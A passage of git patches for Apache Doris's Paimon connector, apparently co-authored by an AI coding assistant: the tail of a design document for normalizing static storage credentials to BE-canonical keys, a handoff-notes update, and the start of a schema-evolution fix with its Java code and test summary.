`HdfsProperties.getBackendConfigProperties()` preserves every user `hadoop.`/`dfs.`/`fs.`/`juicefs.` override **and** adds the legacy-derived defaults the current loop drops (the review §211 MINOR, folded in for free). It also drops the `hive.*` keys the connector currently leaks — legacy never sends those to the scan location props, so dropping them **restores** parity. One SPI call replaces a fiddly prefix loop. + +### SPI (`fe-connector-spi/ConnectorContext.java`) — new default no-op method +```java +/** Returns the catalog's static storage credentials/config normalized to BE-canonical scan + * properties (AWS_* for object stores, hadoop/dfs for HDFS) — the engine runs the same + * CredentialUtils.getBackendPropertiesFromStorageMap legacy/iceberg/hive use. BE's native reader + * only understands these canonical keys; a connector that copies raw catalog aliases (s3.access_key, + * oss.access_key, …) to BE gets no usable creds (403 on private buckets). The connector cannot do + * this itself (must not import fe-core StorageProperties). Default = empty, so every other connector + * is unaffected. */ +default Map getBackendStorageProperties() { return Collections.emptyMap(); } +``` + +### fe-core impl (`DefaultConnectorContext.java`) — real normalization +```java +@Override +public Map getBackendStorageProperties() { + // Mirror legacy PaimonScanNode.getLocationProperties(): the catalog's parsed StorageProperties + // map -> BE-canonical keys (AWS_* / hadoop / dfs). Single source of truth (the SAME + // getBackendPropertiesFromStorageMap legacy/iceberg/hive use), so no drift. Empty when the + // catalog wires no storage map (non-plugin ctors; local-FS warehouse) -> no overlay, parity. + return CredentialUtils.getBackendPropertiesFromStorageMap(storagePropertiesSupplier.get()); +} +``` +`CredentialUtils` is already imported (used by `vendStorageCredentials`). The `storagePropertiesSupplier` field/ctor already exist (added in #1). **No ctor change.** Fail-behavior: `getBackendPropertiesFromStorageMap` on the parsed map does not throw (the map is already validated at catalog creation); an empty map yields an empty result (no overlay) — correct for credential-less warehouses, unlike `normalizeStorageUri` which must fail-loud on an un-normalizable *path*. + +### connector (`PaimonScanPlanProvider.getScanNodeProperties`) — replace the raw loop +Replace the `for (entry : properties) { if (prefix s3./oss./… /hive.) props.put("location."+key, val) }` loop (`:372-381`) with: +```java +// Static catalog-level storage credentials/config, normalized to BE-canonical keys (AWS_* for +// object stores, hadoop/dfs for HDFS). Ports legacy PaimonScanNode.getLocationProperties() = +// getBackendPropertiesFromStorageMap(storagePropertiesMap); BE's native reader only understands the +// canonical keys, so the raw catalog aliases (s3.access_key, …) must be translated before they +// leave FE. The connector cannot import fe-core StorageProperties -> delegates to the +// ConnectorContext seam. Empty when no context (offline unit tests) -> no storage props emitted +// (never the broken raw aliases). +if (context != null) { + for (Map.Entry e : context.getBackendStorageProperties().entrySet()) { + props.put("location." + e.getKey(), e.getValue()); + } +} +``` +The vended overlay (`:388-393`) stays immediately after — vended overlays static, wins on key collision (legacy precedence preserved). No new connector imports (`Map`/`LinkedHashMap` already imported) → import-gate stays clean. + +## Implementation Plan +1. `ConnectorContext.java`: add `getBackendStorageProperties()` default returning `Collections.emptyMap()`. +2. `DefaultConnectorContext.java`: add the `getBackendStorageProperties()` override (one line; reuses the existing supplier + `CredentialUtils` import). +3. `PaimonScanPlanProvider.java`: replace the static prefix-copy loop with the `getBackendStorageProperties()` overlay (context-gated). +4. Tests (below). Build `:fe-core -am` (SPI + fe-core) then `:fe-connector-paimon -am`. +5. `tools/check-connector-imports.sh` must stay clean. + +## Risk Analysis +- **Regression on public/`s3://`/`hdfs://` warehouses**: for a correctly-configured catalog, `getStoragePropertiesMap()` holds the matching `StorageProperties`, so `getBackendPropertiesFromStorageMap` produces the same canonical keys legacy produces. Legacy ships exactly this map → parity. Public buckets get the same `AWS_*` (possibly empty creds + anonymous provider) as legacy. +- **HDFS catalogs**: full replacement is strictly ≥ the old passthrough (preserves user `hadoop.`/`dfs.`/`fs.`/`juicefs.` + adds legacy defaults). Behavioral delta is an *improvement* matching legacy. The only dropped keys are `hive.*`, which legacy never sent to scan location props. +- **Empty storage map** (local-FS warehouse, or non-plugin ctor): returns empty → no overlay. Legacy `getBackendPropertiesFromStorageMap({})` is also empty → parity. BE reads local files without creds. +- **No-context (offline unit tests only)**: the static overlay is skipped (gated, like the vended overlay) → no `location.*` storage props. Production always wires the context (`PaimonConnector:93`), so this only affects unit tests. The old offline behavior (emitting raw `location.s3.*`) was the *bug* — emitting nothing offline is correct. +- **Vended precedence**: vended overlay runs after the static overlay (unchanged), so vended still wins on collision. For REST catalogs the static map may lack keys; the per-table vended overlay supplies them — same two-step structure as today, only the static step is fixed. +- **`AWS_CREDENTIALS_PROVIDER_TYPE=ANONYMOUS` edge (investigated → non-issue)**: unlike legacy (which merges vended INTO the static `StorageProperties` then normalizes ONCE, so keys are present before the provider-type is computed), the connector normalizes static and vended in two steps. So a REST catalog that *also* carries a static object-store endpoint **without** static keys could have the static overlay emit `AWS_CREDENTIALS_PROVIDER_TYPE=ANONYMOUS` (blank-key branch of `AbstractS3CompatibleProperties:124-128`), which the vended overlay (carrying keys → no provider-type) would not clear. **Verified harmless against BE**: both `s3_util.cpp` credential providers (`_get_aws_credentials_provider_v1:383-389`, `_v2:448-455`) check explicit `ak`/`sk` **first** and return `SimpleAWSCredentialsProvider`, never reaching the `Anonymous` branch when keys are present. So the vended keys always win on BE; no regression. (For the primary B-9 case — static catalog WITH keys — the provider-type is null and never emitted.) +- **Other connectors**: identity (empty) SPI default; only paimon calls it. Zero impact on es/jdbc/maxcompute/trino. (hive/hudi connectors carry the same latent raw-passthrough pattern but are out of scope here.) + +## Test Plan + +### Unit Tests +1. **`DefaultConnectorContextBackendStoragePropsTest` (fe-core)** — build a real OSS `StorageProperties` map via `StorageProperties.createAll({oss.endpoint, oss.access_key, oss.secret_key})` (same machinery a real catalog uses), construct `DefaultConnectorContext` with it, assert `getBackendStorageProperties()` carries `AWS_ACCESS_KEY=ak` / `AWS_SECRET_KEY=sk` / a non-blank `AWS_ENDPOINT`, and carries **no** raw `oss.access_key` key. Assert the no-supplier ctor (`new DefaultConnectorContext("c",1L)`) returns empty. *Encodes WHY: BE only consumes canonical AWS_*; mutation = returning the raw oss.* keys or the no-op default → red.* +2. **`PaimonScanPlanProviderTest` (connector)** — three changes: + - **new** `getScanNodePropertiesNormalizesStaticCreds`: connector `properties` holds the raw `s3.access_key`; a context returns canonical `{AWS_ACCESS_KEY,AWS_SECRET_KEY,AWS_ENDPOINT}` from `getBackendStorageProperties()`. Assert `location.AWS_ACCESS_KEY` etc. present **and** `location.s3.access_key` **absent** (the raw alias is no longer leaked). *WHY: the B-9 bug is the raw alias reaching BE; mutation = re-introducing the raw passthrough → red.* + - **modify** `getScanNodePropertiesOverlaysVendedCreds`: static now comes from `getBackendStorageProperties()` (`{AWS_ACCESS_KEY=static-ak, AWS_ENDPOINT=static-ep}`); vended `{AWS_ACCESS_KEY=vended-ak, AWS_SECRET_KEY, AWS_TOKEN, AWS_ENDPOINT=vended-ep}`. Assert vended wins the `AWS_ACCESS_KEY`/`AWS_ENDPOINT` collision and adds `AWS_SECRET_KEY`/`AWS_TOKEN`. *WHY: vended overlays static (legacy precedence); mutation = overlaying static after vended → red.* + - **modify** `getScanNodePropertiesNoContextUnchanged` → `getScanNodePropertiesNoContextNoStorageProps`: 2-arg ctor (no context), raw `s3.endpoint` in props. Assert **no** `location.*` storage key is emitted (no NPE; the broken raw alias is never shipped). *WHY: the connector cannot normalize without the engine seam; mutation = NPE on null context, or re-adding the raw passthrough → red.* + +### E2E Tests (CI-gated — note, do not claim run) +- `test_paimon_*` native-read suites over a **private** S3/OSS bucket (static `s3.access_key`/`oss.access_key` catalog): `SELECT *` over raw parquet/orc must return rows (not 403). Requires live private-bucket creds → CI-gated. + +## SPI / logs +- New SPI method `ConnectorContext.getBackendStorageProperties` → register in `plan-doc/01-spi-extensions-rfc.md` (§22 / E14). +- User-signed scope decision (full legacy-parity replacement) → `plan-doc/decisions-log.md` D-048. +- No deviation: this is exact legacy parity (unlike #1's static-vs-vended scope note). + +## Result (2026-06-11 — implemented + verified) +- **Implemented exactly as designed**: SPI `ConnectorContext.getBackendStorageProperties` (empty default); `DefaultConnectorContext` override = `CredentialUtils.getBackendPropertiesFromStorageMap(storagePropertiesSupplier.get())` (reuses the #1-wired supplier + existing `CredentialUtils` import — **no ctor change**); `PaimonScanPlanProvider.getScanNodeProperties` replaces the raw prefix-copy loop with a context-gated overlay of that map (vended overlay stays after → vended wins). +- **ANONYMOUS-leak edge investigated → non-issue**: traced to BE `s3_util.cpp` — both credential providers (`_v1:383-389`, `_v2:448-455`) prefer explicit `ak`/`sk` over `cred_provider_type`, so a static-leaked `AWS_CREDENTIALS_PROVIDER_TYPE=ANONYMOUS` is never consulted when vended keys are present. No regression; no deviation logged. +- **Build + UT (green)**: `mvn test -pl :fe-core -am -Dtest=DefaultConnectorContext*` → `DefaultConnectorContextBackendStoragePropsTest` 2/0/0 (new), `DefaultConnectorContextNormalizeUriTest` 4/0/0 + `DefaultConnectorContextVendTest` 2/0/0 (unbroken). `mvn test -pl :fe-connector-paimon -am` → BUILD SUCCESS, module **217/0/0** (1 CI-gated skip); `PaimonScanPlanProviderTest` 18→19. Checkstyle clean (build-bound). `tools/check-connector-imports.sh` clean. +- **Fail-before/pass-after proven**: reverted the connector main change → `getScanNodePropertiesNormalizesStaticCreds` (AWS_ACCESS_KEY null) + `getScanNodePropertiesNoContextNoStorageProps` (raw alias shipped) go **red**; restored → green. (The 3rd test pins vended precedence, orthogonal — stays green either way.) +- **Tests added/changed**: fe-core `DefaultConnectorContextBackendStoragePropsTest` (OSS static creds → AWS_*, raw alias absent; no-supplier → empty); connector `PaimonScanPlanProviderTest` (+new `getScanNodePropertiesNormalizesStaticCreds`; modified `getScanNodePropertiesOverlaysVendedCreds` to canonical-key collision; renamed `getScanNodePropertiesNoContextUnchanged`→`getScanNodePropertiesNoContextNoStorageProps`). +- **Not run (CI-gated)**: live private-bucket (S3/OSS) native-read e2e — noted as gated, not executed. +- Logged: SPI RFC §22 (E14), decisions-log D-048 (full legacy-parity scope, user-signed). From 2e327fe2fd40fdc77ac1729f0de7c7317dda1524 Mon Sep 17 00:00:00 2001 From: morningman Date: Thu, 11 Jun 2026 13:55:43 +0800 Subject: [PATCH 018/128] docs: checkpoint rereview2 #2 done; hand off #3 FIX-SCHEMA-EVOLUTION MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Record FIX-STATIC-CREDS-BE commit d23d5df9914 in the task-list and update HANDOFF.md (HEAD, migration chain, completed/next sections). Next: #3 FIX-SCHEMA-EVOLUTION (B-1a+M-10) — the largest P0 SPI surface, independent of #1/#2; recommend a fresh session. Co-Authored-By: Claude Opus 4.8 (1M context) --- plan-doc/HANDOFF.md | 23 ++++++++++++++--------- plan-doc/task-list-P5-rereview2-fixes.md | 2 +- 2 files changed, 15 insertions(+), 10 deletions(-) diff --git a/plan-doc/HANDOFF.md b/plan-doc/HANDOFF.md index 2ecee9e3ad38f6..bb5df21d84bb7c 100644 --- a/plan-doc/HANDOFF.md +++ b/plan-doc/HANDOFF.md @@ -5,19 +5,24 @@ --- -# 🎯 下一个 session 的任务 — **逐一修复 paimon connector 第二轮 review 的问题(#1 已完成 → 从 #2 起)** +# 🎯 下一个 session 的任务 — **逐一修复 paimon connector 第二轮 review 的问题(#1+#2 已完成 → 从 #3 起)** 第二轮 clean-room 对抗 review 已完成(report:[`plan-doc/reviews/P5-paimon-rereview2-2026-06-11.md`](./reviews/P5-paimon-rereview2-2026-06-11.md),含 §9 与第一轮的交叉核对)。结论:**NOT commit-ready** —— 4 个 confirmed BLOCKER 族 + 6 个 confirmed MAJOR。问题**按优先级排成任务列表**: 👉 **任务清单(按优先级):[`plan-doc/task-list-P5-rereview2-fixes.md`](./task-list-P5-rereview2-fixes.md)** —— 逐条含 finding 引用、连接器 `file:line`、legacy parity 锚、fix sketch、SPI 影响、测法。 -## ✅ 本 session 已完成:#1 `FIX-URI-NORMALIZE`(BLOCKER B-7DF+B-7DV)—— commit `20b19d19dd8` -- native 数据文件路径 + DV 路径裸传 BE(oss/cos/obs/s3a 未归一化 s3://)→ S3-兼容 warehouse native 读挂 / DV 静默丢错行。**两路径机制不同**:数据文件经 `PluginDrivenSplit` 单-arg `LocationPath.of`→`FileQueryScanNode:568`;DV 由连接器 `populateRangeParams` 烤进 thrift(fe-core 不经手)→ bridge-only 修不到 DV。 -- **修法**:新 SPI `ConnectorContext.normalizeStorageUri`(恒等 default,仿 `vendStorageCredentials`);`DefaultConnectorContext` 经引擎 2-arg `LocationPath.of` + catalog 静态 storage map(新 lazy supplier + 4-arg ctor,`PluginDrivenExternalCatalog` 接线);连接器在抽出的可测 `buildNativeRange` 对**数据文件 + DV 双路**调 `normalizeUri`。fail-loud。 -- **验证**:paimon 216/0/0(+3 wiring 测)、fe-core 目标测绿(normalize 4/0/0 + vend 2/0/0 未坏)、checkstyle 0、import-gate 净。live OSS+DV e2e CI-gated(未跑)。设计 [`P5-fix-URI-NORMALIZE-design.md`](./tasks/designs/P5-fix-URI-NORMALIZE-design.md)、SPI RFC §21、[DV-025](./deviations-log.md)(静态-vs-vended map scope)。 +## ✅ 已完成:#1 `FIX-URI-NORMALIZE`(B-7DF+B-7DV)`20b19d19dd8` · #2 `FIX-STATIC-CREDS-BE`(B-9)`d23d5df9914` +**#1**(native 数据文件 + DV 路径未归一化 oss/cos/obs/s3a→s3):新 SPI `ConnectorContext.normalizeStorageUri`(恒等 default);`DefaultConnectorContext` 经引擎 2-arg `LocationPath.of` + catalog 静态 storage map(lazy supplier + 4-arg ctor,`PluginDrivenExternalCatalog` 接线);连接器在 `buildNativeRange` 对数据文件+DV 双路调 `normalizeUri`。设计 [`P5-fix-URI-NORMALIZE-design.md`]、RFC §21、[DV-025]。 -## 🔜 下一个 session:从 **#2 `FIX-STATIC-CREDS-BE`** 起,按 task-list 顺序续修 -> ⚠️ 见下「给下一个 agent 的 meta」:#1 已建好「BE-bound scan-prop 经 `ConnectorContext` 归一化」缝(`normalizeStorageUri`),#2(静态 s3/oss/cos/obs 凭据→BE `AWS_*`)可复用同模式(在 `DefaultConnectorContext` 加凭据归一化或扩 `vendStorageCredentials` tail)。#2 与 #1 共「BE scan-prop 归一化」主题。 +**#2(本 session)**`FIX-STATIC-CREDS-BE`(BLOCKER B-9)—— commit `d23d5df9914` +- 静态 catalog 凭据(`s3.`/`oss.`/`cos.`/`obs.`…)裸拷进 `location.`、bridge 只剥前缀 → BE native(FILE_S3) reader 只认 `AWS_*` → 私有桶 native 读 403。凭据**第三道缝**(static→BE-scan,review §9.3,两轮均漏;FileIO 缝=FIX-STORAGE-CREDS、vended 缝=FIX-REST-VENDED 已修)。 +- **修法(D-048 用户签字 full legacy-parity)**:新 SPI `ConnectorContext.getBackendStorageProperties()`(空 default)= 引擎复用 **#1 已接线的** `storagePropertiesSupplier` 跑 `CredentialUtils.getBackendPropertiesFromStorageMap`(无 ctor 改、`CredentialUtils` 已 import);连接器**整段**替换裸前缀拷贝循环为该 overlay(vended overlay 仍后置、collision 胜)。object-store→`AWS_*`;HDFS→canonical(顺修 §211 MINOR);丢非-parity `hive.*`。 +- **ANONYMOUS-leak 边角经 BE 证伪无回归**(`s3_util.cpp` v1:383/v2:448 显式 ak/sk 优先于 `cred_provider_type`)。 +- **验证**:fe-core `DefaultConnectorContextBackendStoragePropsTest` 2/0/0(+normalize 4/0/0、vend 2/0/0 未坏)、paimon 模块 **217/0/0**、checkstyle 0、import-gate 净、red-check 反转 2/3 向红。live 私有桶 native e2e CI-gated(未跑)。设计 [`P5-fix-STATIC-CREDS-BE-design.md`](./tasks/designs/P5-fix-STATIC-CREDS-BE-design.md)、RFC §22(E14)、[D-048](./decisions-log.md)。 + +## 🔜 下一个 session:从 **#3 `FIX-SCHEMA-EVOLUTION`** 起,按 task-list 顺序续修 +> ⚠️ #3(B-1a+M-10,BLOCKER)= **P0 中 SPI surface 最大 + 失败模式最危险(静默错行)**,但触发更窄(schema-evolved + native + rename)。需 thread paimon `DataField.id()` 过 SPI `ConnectorColumn`(含 nested ARRAY/MAP/ROW)→ `Column.setUniqueId`,并经 bridge 发 `current_schema_id` + per-split `history_schema_info`(`ExternalUtil.initSchemaInfo`)。BE 契约冻结于 `table_schema_change_helper.h:219-267`。**独立于 #1/#2**(不复用 BE-scan-prop 归一化缝)→ 值得**新 session 起、fresh context**。 +> ⚠️ 「BE-bound scan-prop 经 `ConnectorContext` 归一化」缝已由 #1/#2 建好两法(`normalizeStorageUri` URI / `getBackendStorageProperties` 凭据)—— 后续若有同类 BE-prop gap 可复用此模式。 > ⚠️ P2 两条(#8 count-pushdown / #9 sub-split)严重度有争议(R1=MINOR/R2=MAJOR,均结果正确仅性能)—— **动手前先找用户定 scope**(accept-or-defer),别默认全做。 每条遵循项目既定 per-fix 流程(与 `step-by-step-fix` skill 一致): @@ -43,11 +48,11 @@ --- # 📦 仓库状态 -- **HEAD = `20b19d19dd8`**(`fix: FIX-URI-NORMALIZE`,本 session #1 修复;其父 `98a73bf7692` = `[P5-B7+fixes]`)。该 commit 含 #1 代码+测试+设计 doc+SPI RFC §21+DV-025+task-list 进度,并一并纳入上一 session 未 commit 的 review report + task-list。本 session 改动(**未 commit**):`plan-doc/HANDOFF.md`(本文件)、`plan-doc/task-list-P5-rereview2-fixes.md`(#1 commit-cell 标 ✅ 的后续微调);scratch 仍未 commit(`.audit-scratch/` `conf.cmy/` `META-INF/` `*.bak`)。 +- **HEAD = `d23d5df9914`**(`fix: FIX-STATIC-CREDS-BE`,本 session #2 修复;其父 `20b19d19dd8` = #1 `FIX-URI-NORMALIZE`)。该 commit 含 #2 代码+测试+设计 doc+SPI RFC §22(E14)+D-048+task-list 进度(9 文件,无 regression-conf/scratch)。本 session 剩余改动(**未 commit**):`plan-doc/HANDOFF.md`(本文件)、`plan-doc/task-list-P5-rereview2-fixes.md`(#2 commit-cell 填 hash 的后续微调);scratch 仍未 commit(`.audit-scratch/` `conf.cmy/` `META-INF/` `*.bak`)。 - ⚠️ **`regression-test/conf/regression-conf.groovy` 仍 modified-未 commit 且含明文 Aliyun key** —— 任何 commit 前继续 path-whitelist,严禁 `git add -A`。 - 当前分支 `catalog-spi-07-paimon`(非 `master`)→ 在此 commit 修复 OK。 - **legacy `datasource/paimon/*` 仍在树内**(B8 删除未做)→ 每个 fix 都能 side-by-side diff 做 parity。 -- 迁移链:`512a67ee3ac`(B0)→`807308993fb`(B1)→`a2b765677d1`(B2/B3)→`ae5ad30b938`(B4)→`d2a2c8d761a`(B5/B6)→`98a73bf7692`(B7+fixes)→`20b19d19dd8`(rereview2 #1 FIX-URI-NORMALIZE, HEAD)。 +- 迁移链:`512a67ee3ac`(B0)→`807308993fb`(B1)→`a2b765677d1`(B2/B3)→`ae5ad30b938`(B4)→`d2a2c8d761a`(B5/B6)→`98a73bf7692`(B7+fixes)→`20b19d19dd8`(rereview2 #1 URI-NORMALIZE)→`d23d5df9914`(rereview2 #2 STATIC-CREDS-BE, HEAD)。 ## ⚠️ Commit 须知(任何 `git add` 前必读) - **硬前置**:scrub `regression-test/conf/regression-conf.groovy`(明文 Aliyun key)+ 清 scratch(`.audit-scratch/` `conf.cmy/` `META-INF/` `*.bak`)。**path-whitelist `git add`,严禁 `git add -A`。** diff --git a/plan-doc/task-list-P5-rereview2-fixes.md b/plan-doc/task-list-P5-rereview2-fixes.md index aea9f2fc004006..85fadaade964ec 100644 --- a/plan-doc/task-list-P5-rereview2-fixes.md +++ b/plan-doc/task-list-P5-rereview2-fixes.md @@ -24,7 +24,7 @@ | # | ID | sev | finding | area / file(s) | SPI? | design | impl | build+UT | commit | |---|----|-----|---------|----------------|------|--------|------|----------|--------| | 1 | FIX-URI-NORMALIZE | BLOCKER | B-7DV + B-7DF | native data-file + DV path scheme norm (oss/cos/obs/s3a→s3) | **yes** | ✅ | ✅ | ✅ | ✅ `20b19d19dd8` | -| 2 | FIX-STATIC-CREDS-BE | BLOCKER | B-9 | static s3/oss/cos/obs creds → BE as canonical `AWS_*` | **yes** | ✅ | ✅ | ✅ | ✅ | +| 2 | FIX-STATIC-CREDS-BE | BLOCKER | B-9 | static s3/oss/cos/obs creds → BE as canonical `AWS_*` | **yes** | ✅ | ✅ | ✅ | ✅ `d23d5df9914` | | 3 | FIX-SCHEMA-EVOLUTION | BLOCKER | B-1a (+M-10) | emit `current_schema_id`/`history_schema_info` + field-id thru SPI | **yes** | ⬜ | ⬜ | ⬜ | ⬜ | | 4 | FIX-JDBC-DRIVER-URL | BLOCKER | B-8a + B-8b | resolve+alias `jdbc.driver_url` for BE; enforce security allow-list | maybe | ⬜ | ⬜ | ⬜ | ⬜ | | 5 | FIX-MAPPING-FLAG-KEYS | MAJOR | M-crit | dotted-vs-underscore type-mapping flag keys (wrong type) | no | ⬜ | ⬜ | ⬜ | ⬜ | From 66a447ea1d360d9ecfeccf7c8ac22778f4716f58 Mon Sep 17 00:00:00 2001 From: morningman Date: Thu, 11 Jun 2026 17:59:06 +0800 Subject: [PATCH 019/128] =?UTF-8?q?fix:=20FIX-SCHEMA-EVOLUTION=20=E2=80=94?= =?UTF-8?q?=20emit=20native=20current=5Fschema=5Fid/history=5Fschema=5Finf?= =?UTF-8?q?o=20from=20the=20connector?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Root cause (rereview2 BLOCKER B-1a): on the native (ORC/Parquet) read path the paimon connector emitted only the per-file TPaimonFileDesc.schema_id but never set the scan-level TFileScanRangeParams.current_schema_id / history_schema_info. BE (table_schema_change_helper.h:219-237) then took the !__isset branch and fell back to NAME-based file<->table column matching, so a schema-evolved (renamed / reordered) table read NULL/garbage for the renamed columns silently. JNI path is unaffected; native is the default. (M-10, Column.uniqueId=-1, deferred — DV-026.) Design C (user-signed D-049): BE's field-id matcher (table_schema_change_helper .cpp:312-430) reads only TField.id/name and a nested-vs-scalar type.type tag — no Doris Type, no tuple descriptor — and org.apache.doris.thrift.* is import-legal in connectors, so the connector builds the TSchema dictionary directly from paimon SchemaManager and ships it via the existing populateScanLevelParams hook (the seam DV-006 anticipated for hudi). Zero new SPI surface; connector-only. - current_schema_id = -1; history_schema_info = the -1/current (pinned) schema + one entry per SchemaManager.listAllIds() so every native file schema_id is covered (BE fails loud on a missing entry, never silent). - transport: base64 TBinaryProtocol carrier (a throwaway TFileScanRangeParams) via a props key, because getScanPlanProvider() is per-call (no shared state). Clean-room 3-lens review found 2 real BLOCKERs in the -1/current entry (both fixed + re-verified): (1) column-name casing — BE keys the table-side StructNode by the -1 entry's name verbatim while the native reader queries the lowercase Doris slot name, and current_schema_id=-1 never hits the ConstNode fast-path, so a mixed-case column crashed (std::out_of_range) even on never-evolved tables; fix lowercases ONLY top-level names (default-locale, matching the slot-name producer + legacy parseSchema:507; nested stays paimon-cased per legacy PaimonUtil:302). (2) time travel — the -1 entry used schemaManager.latest() (absolute latest) instead of the snapshot-pinned schema the tuple uses; fix builds it from FileStoreTable.schema() (pinned) and narrows the guard DataTable->FileStoreTable. Eager all-schemas read accepted as a fail-loud deviation (DV-027). Tests: PaimonScanPlanProviderTest +5 (field-id/name carriage, nested ARRAY/MAP/ STRUCT shape + struct-child ids, scalar tag, rename round-trip apply, top-level lowercase vs nested paimon-case, non-FileStoreTable skip). Module 222/0/0 (1 CI-gated skip), checkstyle clean, import-gate clean. e2e test_paimon_full_schema_change.groovy is CI-gated (not run). Design doc + D-049 + DV-026/DV-027 + SPI RFC §23 (no new SPI). Co-Authored-By: Claude Opus 4.8 (1M context) --- .../paimon/PaimonScanPlanProvider.java | 203 +++++++++++++++++ .../paimon/PaimonScanPlanProviderTest.java | 153 +++++++++++++ plan-doc/01-spi-extensions-rfc.md | 14 ++ plan-doc/decisions-log.md | 1 + plan-doc/deviations-log.md | 4 +- plan-doc/task-list-P5-rereview2-fixes.md | 3 +- .../designs/P5-fix-SCHEMA-EVOLUTION-design.md | 212 ++++++++++++++++++ 7 files changed, 588 insertions(+), 2 deletions(-) create mode 100644 plan-doc/tasks/designs/P5-fix-SCHEMA-EVOLUTION-design.md diff --git a/fe/fe-connector/fe-connector-paimon/src/main/java/org/apache/doris/connector/paimon/PaimonScanPlanProvider.java b/fe/fe-connector/fe-connector-paimon/src/main/java/org/apache/doris/connector/paimon/PaimonScanPlanProvider.java index 530dc79c3aa4f9..810def2a6b02e4 100644 --- a/fe/fe-connector/fe-connector-paimon/src/main/java/org/apache/doris/connector/paimon/PaimonScanPlanProvider.java +++ b/fe/fe-connector/fe-connector-paimon/src/main/java/org/apache/doris/connector/paimon/PaimonScanPlanProvider.java @@ -24,7 +24,16 @@ import org.apache.doris.connector.api.scan.ConnectorScanPlanProvider; import org.apache.doris.connector.api.scan.ConnectorScanRange; import org.apache.doris.connector.spi.ConnectorContext; +import org.apache.doris.thrift.TColumnType; import org.apache.doris.thrift.TFileScanRangeParams; +import org.apache.doris.thrift.TPrimitiveType; +import org.apache.doris.thrift.schema.external.TArrayField; +import org.apache.doris.thrift.schema.external.TField; +import org.apache.doris.thrift.schema.external.TFieldPtr; +import org.apache.doris.thrift.schema.external.TMapField; +import org.apache.doris.thrift.schema.external.TNestedField; +import org.apache.doris.thrift.schema.external.TSchema; +import org.apache.doris.thrift.schema.external.TStructField; import com.fasterxml.jackson.core.type.TypeReference; import com.fasterxml.jackson.databind.ObjectMapper; @@ -39,6 +48,7 @@ import org.apache.paimon.io.DataOutputViewStreamWrapper; import org.apache.paimon.rest.RESTToken; import org.apache.paimon.rest.RESTTokenFileIO; +import org.apache.paimon.schema.SchemaManager; import org.apache.paimon.table.FileStoreTable; import org.apache.paimon.table.Table; import org.apache.paimon.table.source.DataSplit; @@ -47,10 +57,16 @@ import org.apache.paimon.table.source.ReadBuilder; import org.apache.paimon.table.source.Split; import org.apache.paimon.table.source.TableScan; +import org.apache.paimon.types.ArrayType; +import org.apache.paimon.types.DataField; import org.apache.paimon.types.DataType; +import org.apache.paimon.types.MapType; import org.apache.paimon.types.RowType; import org.apache.paimon.utils.InstantiationUtil; import org.apache.paimon.utils.RowDataToObjectArrayConverter; +import org.apache.thrift.TDeserializer; +import org.apache.thrift.TSerializer; +import org.apache.thrift.protocol.TBinaryProtocol; import java.io.ByteArrayOutputStream; import java.nio.charset.StandardCharsets; @@ -117,6 +133,16 @@ public class PaimonScanPlanProvider implements ConnectorScanPlanProvider { // (paimon::Split::Deserialize), so FE must serialize a DataSplit with that format, not Java serde. private static final String ENABLE_PAIMON_CPP_READER = "enable_paimon_cpp_reader"; + // FIX-SCHEMA-EVOLUTION (B-1a): scan-level prop carrying the base64 TBinaryProtocol-serialized + // schema dictionary (a throwaway TFileScanRangeParams holding current_schema_id + + // history_schema_info). getScanNodeProperties builds it from the live table; populateScanLevelParams + // applies it to the real params. Transport via the props map because getScanPlanProvider() returns a + // fresh provider per call (no shared instance state between the two SPI methods). + private static final String SCHEMA_EVOLUTION_PROP = "paimon.schema_evolution"; + // Legacy parity: current_schema_id is the -1 sentinel ("latest"); the current/target schema is + // also pushed into history_schema_info under this key (PaimonScanNode.doInitialize -> -1L). + private static final long CURRENT_SCHEMA_ID = -1L; + private final Map properties; private final PaimonCatalogOps catalogOps; private final ConnectorContext context; @@ -395,6 +421,14 @@ public Map getScanNodeProperties( } } + // FIX-SCHEMA-EVOLUTION (B-1a): emit the native-reader schema dictionary so BE matches file<->table + // columns BY FIELD ID across schema evolution (rename/reorder) instead of falling back to NAME + // matching (which silently reads NULL/garbage for renamed columns). Only meaningful when the table + // can take the native path (a DataTable read without force_jni_scanner); JNI splits never consult it. + if (!paimonHandle.isForceJni()) { + buildSchemaEvolutionParam(table).ifPresent(v -> props.put(SCHEMA_EVOLUTION_PROP, v)); + } + return props; } @@ -623,6 +657,175 @@ public void populateScanLevelParams(TFileScanRangeParams params, LOG.warn("Failed to parse paimon.options_json", e); } } + + // FIX-SCHEMA-EVOLUTION (B-1a): apply the schema dictionary built in getScanNodeProperties. Fail + // loud on a decode error — this prop is produced by us, so a failure is a real bug, and silently + // dropping it would re-introduce the silent wrong-rows BLOCKER on schema-evolved native reads. + String schemaEvolution = properties.get(SCHEMA_EVOLUTION_PROP); + if (schemaEvolution != null && !schemaEvolution.isEmpty()) { + applySchemaEvolutionParam(params, schemaEvolution); + } + } + + /** + * FIX-SCHEMA-EVOLUTION (B-1a): builds the native-reader schema dictionary + * ({@code current_schema_id} + {@code history_schema_info}) for {@code table} and serializes it for + * transport via the scan-node props (see {@link #SCHEMA_EVOLUTION_PROP}). + * + *

      Returns empty for non-{@link FileStoreTable}s (paimon system tables such as {@code audit_log} / + * {@code binlog} read via JNI and never consult {@code history_schema_info}). The carrier is a + * throwaway {@link TFileScanRangeParams} (the exact thrift target), so + * {@link #applySchemaEvolutionParam} only has to copy the two fields back.

      + * + *

      Parity with legacy {@code PaimonScanNode}: {@code current_schema_id = -1} and the current/target + * schema is pushed under that sentinel. Crucially it is built from {@code table.schema()} — the + * resolved (snapshot-PINNED) schema, the SAME schema the query's tuple slots use — so a time-travel + * read keys BE's table-side {@code StructNode} by the pinned column names (legacy built the -1 entry + * from {@code getTargetTable().getColumns()}, also snapshot-aware; {@code schemaManager().latest()} + * would wrongly use the absolute latest schema). Per-schema historical entries are added for every + * committed schema id ({@link SchemaManager#listAllIds()}) so any native file's {@code schema_id} is + * covered (BE fails loud — {@code "miss table/file schema info"} — if a referenced id is absent). + * Schema reads that throw are allowed to propagate (fail loud, mirroring legacy + * {@code putHistorySchemaInfo}).

